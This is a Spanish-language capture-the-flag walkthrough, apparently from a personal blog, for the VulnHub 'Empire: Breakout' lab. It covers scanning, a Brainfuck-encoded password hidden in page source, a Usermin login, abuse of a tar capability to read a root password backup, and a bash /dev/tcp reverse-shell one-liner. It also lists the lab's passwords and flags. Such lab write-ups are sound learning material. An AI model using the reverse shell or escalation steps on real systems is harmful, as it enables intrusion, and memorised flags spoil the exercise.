I"ï<p><a href="https://www.vulnhub.com/series/empire,507/">https://www.vulnhub.com/series/empire,507/</a></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>nmap <span class="nt">-vvv</span> <span class="nt">-sS</span> <span class="nt">-sV</span> <span class="nt">-O</span> 192.168.1.0/24
</code></pre></div></div>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/1.png" alt="image-center" class="align-center" /></p>

<p>Saldr√° la m√°quina breakout</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/2.png" alt="image-center" class="align-center" /></p>

<p>Entrar al servidor web con la direcci√≥n <code class="language-plaintext highlighter-rouge">192.168.1.146</code>, saldr√° la web por defecto de Apache</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/3.png" alt="image-center" class="align-center" /></p>

<p>Dar click derecho e inspeccionar elemento y saldr√° un mensaje encriptado</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/4.png" alt="image-center" class="align-center" /></p>

<p>Usar el identificador de cifrado de la web decode.fr, dir√° que es cifrado Brainfuck</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/5.png" alt="image-center" class="align-center" /></p>

<p>Usar el descifrador Brainfuck</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/6.png" alt="image-center" class="align-center" /></p>

<p>Tratar de intentar entrar al servidor web con otro de los puertos abiertos, en este caso el 20000</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/7.png" alt="image-center" class="align-center" /></p>

<p>Dir√° que es un servidor bajo SSL por lo que recomienda acceder con https en lugar de http, cambiamos y saldr√° la advertencia de sitio inseguro</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/8.png" alt="image-center" class="align-center" /></p>

<p>Pulsar en avanzado y en aceptar el riesgo y continuar</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/9.png" alt="image-center" class="align-center" /></p>

<p>Saldr√° un login para Usermin</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/10.png" alt="image-center" class="align-center" /></p>

<p>Usar enum4linux para descubrir el usuario que se encuentra en el equipo</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/11.png" alt="image-center" class="align-center" /></p>

<p>Saldr√° el usuario cyber</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/12.png" alt="image-center" class="align-center" /></p>

<p>Usar el usuario cyber y la contrase√±a descifrada anteriormente</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/13.png" alt="image-center" class="align-center" /></p>

<p>Cargar√° el siguiente panel</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/14.png" alt="image-center" class="align-center" /></p>

<p>En la parte inferior se encontrar√°n unos botones, uno de ellos permitir√° abrir una shell</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/15.png" alt="image-center" class="align-center" /></p>

<p>Entrar√° al directorio personal de cyber y con dicho usuario</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/16.png" alt="image-center" class="align-center" /></p>

<p>Listar el contenido, mostrar√° un archivo llamado <code class="language-plaintext highlighter-rouge">user.txt</code></p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/17.png" alt="image-center" class="align-center" /></p>

<p>Mostrar√° el flag del usuario</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/18.png" alt="image-center" class="align-center" /></p>

<p>Usar el comando <code class="language-plaintext highlighter-rouge">getcap</code> con el archivo tar</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/19.png" alt="image-center" class="align-center" /></p>

<p>Ir a <code class="language-plaintext highlighter-rouge">/var/backups</code> y mostrar el contenido</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/20.png" alt="image-center" class="align-center" /></p>

<p>Volver al home de cyber y usar el archivo tar para comprimir el archivo <code class="language-plaintext highlighter-rouge">.old_pass.bak</code></p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/21.png" alt="image-center" class="align-center" /></p>

<p>Descomprimir el archivo creado</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/22.png" alt="image-center" class="align-center" /></p>

<p>Se crear√° un directorio llamado var, dentro de √©l otro llamado backups y dentro de este estar√° el archivo <code class="language-plaintext highlighter-rouge">.old_pass.bak</code> que ahora se podr√° leer</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/23.png" alt="image-center" class="align-center" /></p>

<p>Mostrar√° una contrase√±a para el usuario root</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/24.png" alt="image-center" class="align-center" /></p>

<p>Al tratar de usar el comando su no lo permitir√°</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/25.png" alt="image-center" class="align-center" /></p>

<p>Hacer un reverse shell con el comando</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash <span class="nt">-i</span> <span class="o">&gt;</span>&amp; /dev/tcp/192.168.1.127/4444 0&gt;&amp;1
</code></pre></div></div>

<p>Y poner el puerto de escucha en 4444</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/26.png" alt="image-center" class="align-center" /></p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/27.png" alt="image-center" class="align-center" /></p>

<p>Se abrir√° un shell inverso aunque a√∫n con el usuario cyber</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/28.png" alt="image-center" class="align-center" /></p>

<p>Hacer de nuevo un cat al archivo para poder copiar la contrase√±a</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/29.png" alt="image-center" class="align-center" /></p>

<p>Cambiar de usuario con su, cambiar√° al usuario root aunque sin mostrar texto, de todos modos se pueden escribir comandos</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/30.png" alt="image-center" class="align-center" /></p>

<p>Ir al directorio de root y mostrar el contenido</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/31.png" alt="image-center" class="align-center" /></p>

<p>Mostrar√° el flag del usuario root</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/32.png" alt="image-center" class="align-center" /></p>

<h2 id="usuarios-y-contrase√±as">Usuarios y contrase√±as</h2>

<p>Cyber= .2uqPEfj3D&lt;P‚Äôa-3
Root= Ts&amp;4&amp;YurgtRX(=~h</p>

<h2 id="flags">Flags</h2>

<p>Usuario:  3mp!r3{You_Manage_To_Break_To_My_Secure_Access}</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/33.png" alt="image-center" class="align-center" /></p>

<p>Root: 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}</p>

<p><img src="http://localhost:4000/assets/images/vulnhub/breakout/34.png" alt="image-center" class="align-center" /></p>
:ET